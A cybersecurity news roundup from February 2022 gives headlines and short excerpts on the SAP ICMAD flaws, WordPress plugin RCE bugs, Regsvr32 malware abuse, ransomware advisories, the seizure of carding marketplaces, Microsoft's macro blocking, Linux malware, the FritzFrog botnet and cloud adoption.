Title: CISA Warns Admins to Patch Maximum Severity SAP Vulnerability
Date Published: February 9, 2022
Excerpt: “The US Cybersecurity and Infrastructure Security Agency (CISA) has warned admins to patch a set of severe security flaws dubbed ICMAD (Internet Communication Manager Advanced Desync) and impacting SAP business apps using Internet Communication Manager (ICM). CISA added that failing to patch these vulnerabilities exposes organizations with vulnerable servers to data theft, financial fraud risks, disruptions of mission-critical business processes, ransomware attacks, and a halt of all operations.”
Title: Critical RCE Flaws in PHP Everywhere WordPress Plugin Affect Thousands of Sites
Date Published: February 10, 2022
https://securityaffairs.co/wordpress/127848/hacking/rce-php-everywhere-wordpress-plugin.html
Excerpt: “Wordfence experts found three critical remote code execution vulnerabilities in the PHP Everywhere WordPress plugin, all the issues have received a CVSS score of 9.9.The plugin that allows WordPress admins to insert PHP code in pages, posts, the sidebar, or any Gutenberg block, to display dynamic content based on evaluated PHP expressions.”
Title: Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware
Date Published: February 9, 2022
https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/
Excerpt: “A Windows living-off-the-land binary (LOLBin) known as Regsvr32 is seeing a big uptick in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot. LOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending into normal traffic patterns. In this case, Regsvr32 is aMicrosoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.”
Title: Ransomware Attacks, and Ransom Payments, are Rampant Among Critical Infrastructure Organizations
Date Published: February 10, 2022
https://www.helpnetsecurity.com/2022/02/10/critical-infrastructure-ransomware/
Excerpt: “80% of critical infrastructure organizations experienced a ransomware attack in the last year, with an equal number reporting that their security budgets have risen since 2020, a Claroty report reveals.The report is based on an independent global survey of 1,100 information technology (IT) and operational technology (OT) professionals who work in critical infrastructure sectors, exploring how they have dealt with the significant challenges in 2021, their levels of resiliency, and priorities moving forward.”
Title: Russia Cracks Down on 4 Dark Web Marketplaces for Stolen Credit Cards
Date Published: February 9, 2022
https://thehackernews.com/2022/02/russia-cracks-down-on-4-dark-web.html
Excerpt: ““A special law enforcement operation undertaken by Russia has led to the seizure and shutdown of four online bazaars that specialized in the theft and sales of stolen credit cards, as the government continues to take active measures against harboring cybercriminals on its territory. To that end, the domains operated by the card fraud forms and marketplaces, Ferum Shop, Sky-Fraud, Trump’s Dumps, and UAS, were confiscated and plastered with a banner that warned “theft of funds from bank cards is illegal.” Also embedded into the HTML source code was a message asking, “Which one of you is next?””
Title: Microsoft Will Block Macros by Default from Internet Downloads
Date Published: February 9, 2022
Excerpt: “Microsoft will make it even more difficult to download and run malicious Office documents from the internet, the company announced this week. It’s a change welcomed by security pros. Office macros, which provide programming functions for use in common workplace documents, have been a launching pad for malicious actors since the Clinton administration. The Concept Virus first appeared in 1995. Nearly thirty years later, it is still a problem, despite Microsoft’s previous efforts to curb adversarial use.”
Title: Linux Malware on the Rise
Date Published: February 9, 2022
https://www.darkreading.com/cloud/linux-malware-on-the-rise-including-illicit-use-of-cobalt-strike
Excerpt: ““With Linux frequently used as the basis for cloud services, virtual-machine hosts, and container-based infrastructure, attackers have increasingly targeted Linux environments with sophisticated exploits and malware. New analysis, based on telemetry collected from attacks on VMware customers, shows an increasing number of ransomware programs targeting Linux hosts to infect virtual-machine images or containers; more use of cryptojacking to monetize illicit access; and more than 14,000 instances of Cobalt Strike — 56% of which are pirated copies used by criminals or thrifty companies that have not bought licenses. The red-team tool has become so popular as a way to manage compromised machines that underground developers created their own protocol-compatible version of the Windows program for Linux, VMware states in a newly released report, “Exposing Malware in Linux-based Multi-Cloud Environments.””
Title: FritzFrog Botnet Grows 10x, Hits Healthcare, EDU, and Govt Systems
Date Published: February 10, 2022
Excerpt: “The FritzFrog botnet that’s been active for more than two years has resurfaced with an alarming infection rate, growing ten times in just a month of hitting healthcare, education, and government systems with an exposed SSH server. Discovered in August 2020, the malware is written in Golang and is considered to be a sophisticated threat that relies on custom code, runs in memory, and is decentralized — peer-to-peer (P2P), so it does not need a central management server.”
Title: CISA, FBI, NSA Issue Advisory on Severe Increase in Ransomware Attacks
Date Published: February 10, 2022
https://thehackernews.com/2022/02/cisa-fbi-nsa-issue-advisory-on-severe.html
Excerpt: “Cybersecurity authorities from Australia, the U.K., and the U.S. have published a joint advisory warning of an increase in sophisticated, high-impact ransomware attacks targeting critical infrastructure organizations across the world in 2021. The incidents singled out a broad range of sectors, including defense, emergency services, agriculture, government facilities, IT, healthcare, financial services, education, energy, charities, legal institutions, and public services.”
Title: Cloud Migrations are Taking Longer, and Require Bigger Budgets than Expected
Date Published: February 10, 2022
https://www.helpnetsecurity.com/2022/02/10/using-multi-cloud-platform/
Excerpt: 84% of IT decision-makers across the US and UK say their organization is currently using more than one cloud platform, as businesses’ demands for more choice, flexibility, and agility pushes multi-cloud mainstream in the year ahead, according to a Wanclouds report. The report found that of companies using multiple cloud platforms, 48% are also taking a hybrid approach by utilizing both public and private clouds.”